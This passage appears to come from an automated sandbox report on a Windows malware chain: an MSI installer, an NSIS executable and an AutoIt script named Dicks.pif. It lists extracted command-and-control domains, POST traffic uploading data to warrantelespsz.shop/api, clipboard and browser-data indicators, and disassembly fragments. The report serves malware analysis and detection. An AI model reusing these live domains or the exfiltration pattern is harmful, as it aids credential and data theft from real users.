              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp]23_2_00E70832
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then jmp eax23_2_00E989C0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov esi, eax23_2_00E7FB65
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ebx, dword ptr [edi+04h]23_2_00E84CB0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then movsx eax, byte ptr [esi+ecx]23_2_00E6DC60
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then movzx ebx, dx23_2_00E855E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esi+18h]23_2_00E855E0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then cmp byte ptr [eax+edi+01h], 00000000h23_2_00E70D8E
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then cmp byte ptr [ebx], 00000000h23_2_00E74D94
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then or ebp, 40h23_2_00E61D24
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then cmp dword ptr [eax+esi*8], 11081610h23_2_00E80D10
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ecx, dword ptr [esp+10h]23_2_00E82E84
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then cmp word ptr [ebx+ebp+02h], 0000h23_2_00E7BFA0
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov ecx, dword ptr [esp+00000890h]23_2_00E7EF2B
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 4x nop then mov eax, dword ptr [esp+04h]23_2_00E9BF30

              Networking

              barindex
              Source: Malware configuration extractorURLs: indexterityszcoxp.shop
              Source: Malware configuration extractorURLs: lariatedzugspd.shop
              Source: Malware configuration extractorURLs: callosallsaospz.shop
              Source: Malware configuration extractorURLs: outpointsozp.shop
              Source: Malware configuration extractorURLs: liernessfornicsa.shop
              Source: Malware configuration extractorURLs: upknittsoappz.shop
              Source: Malware configuration extractorURLs: shepherdlyopzc.shop
              Source: Malware configuration extractorURLs: unseaffarignsk.shop
              Source: Malware configuration extractorURLs: warrantelespsz.shop
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warrantelespsz.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: warrantelespsz.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12854Host: warrantelespsz.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15100Host: warrantelespsz.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 19958Host: warrantelespsz.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1242Host: warrantelespsz.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=be85de5ipdocierre1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 572261Host: warrantelespsz.shop
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: warrantelespsz.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000A29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,19_2_000A29BA
              Source: global trafficDNS traffic detected: DNS query: fDwYocEDWIyxswuSuKqfrffGAPh.fDwYocEDWIyxswuSuKqfrffGAPh
              Source: global trafficDNS traffic detected: DNS query: warrantelespsz.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: warrantelespsz.shop
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: MSI53B9.tmp.1.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: SymposiumTaiwan.exe, 00000008.00000000.2491029205.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe, 00000008.00000002.2497310855.0000000000409000.00000002.00000001.01000000.00000009.sdmp, SymposiumTaiwan.exe.4.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0A
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0C
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://ocsp.digicert.com0X
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: Dicks.pif, 00000013.00000000.2532080897.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000002.3265460967.00000000000F9000.00000002.00000001.01000000.0000000A.sdmp, Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Notify.8.drString found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: MSI53B9.tmp, 00000004.00000003.2448741724.00000000067BE000.00000004.00000020.00020000.00000000.sdmp, NB4EASbynx.msi, SymposiumTaiwan.exe.4.dr, 68e8f1.msi.2.dr, MSI53B9.tmp.1.drString found in binary or memory: http://www.digicert.com/CPS0
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Dicks.pif, 00000017.00000003.3180108390.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
              Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.sho8
              Source: Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/
              Source: Dicks.pif, 00000017.00000003.3155264925.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/N
              Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179989281.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/api
              Source: Dicks.pif, 00000017.00000003.3234780524.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/api7N/
              Source: Dicks.pif, 00000017.00000003.3264421996.0000000001173000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266103716.0000000001173000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/apiBNz
              Source: Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/apiOR
              Source: Dicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/fe
              Source: Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3196037635.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/ob
              Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3234579909.00000000011D0000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3179568692.00000000011C3000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/pi
              Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000002.3266151396.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/pid
              Source: Dicks.pif, 00000017.00000003.3264715151.00000000011CF000.00000004.00000020.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3265015608.00000000011CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/pim
              Source: Dicks.pif, 00000017.00000003.3182152456.00000000011C5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop/ta
              Source: Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop:443/api
              Source: Dicks.pif, 00000017.00000002.3266635759.0000000003410000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop:443/api0-
              Source: Dicks.pif, 00000017.00000003.3182124941.000000000341A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://warrantelespsz.shop:443/apiMicrosoft
              Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_86277c656a4bd7d619968160e91c45fd066919bb3bd119b3
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
              Source: Feeling.8.drString found in binary or memory: https://www.globalsign.com/repository/0
              Source: Dicks.pif, 00000017.00000003.3130701565.0000000002C78000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif.10.dr, Feeling.8.drString found in binary or memory: https://www.globalsign.com/repository/06
              Source: Dicks.pif, 00000017.00000003.3156406038.0000000003428000.00000004.00000800.00020000.00000000.sdmp, Dicks.pif, 00000017.00000003.3156254242.000000000343F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
              Source: Dicks.pif, 00000017.00000003.3181573889.000000000343C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: Dicks.pif, 00000017.00000003.3181573889.000000000343C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org
              Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: Dicks.pif, 00000017.00000003.3181638949.0000000003533000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: Dicks.pif, 00000017.00000003.3182027461.00000000011C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.t-mobile.com/cell-phones/brand/apple?cmpid=MGPO_PAM_P_EVGRNIPHN_
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49726 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49727 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49729 version: TLS 1.2
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_004050F9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,8_2_004050F9
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,19_2_000A4830
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000A4830 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,23_2_000A4830
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 23_2_000BEF91 CountClipboardFormats,SetClipboardData,SetRect,CopyImage,SetWindowPos,GetCursorInfo,IsCharAlphaW,IsCharLowerW,IsCharUpperW,GetCaretPos,SetWindowLongW,23_2_000BEF91
              Source: C:\Users\user\AppData\Local\Temp\558563\Dicks.pifCode function: 19_2_000A4632 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,19_2_000A4632
              Source: C:\Users\user\Desktop\SymposiumTaiwan.exeCode function: 8_2_004044D1 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,8_2_004044D1
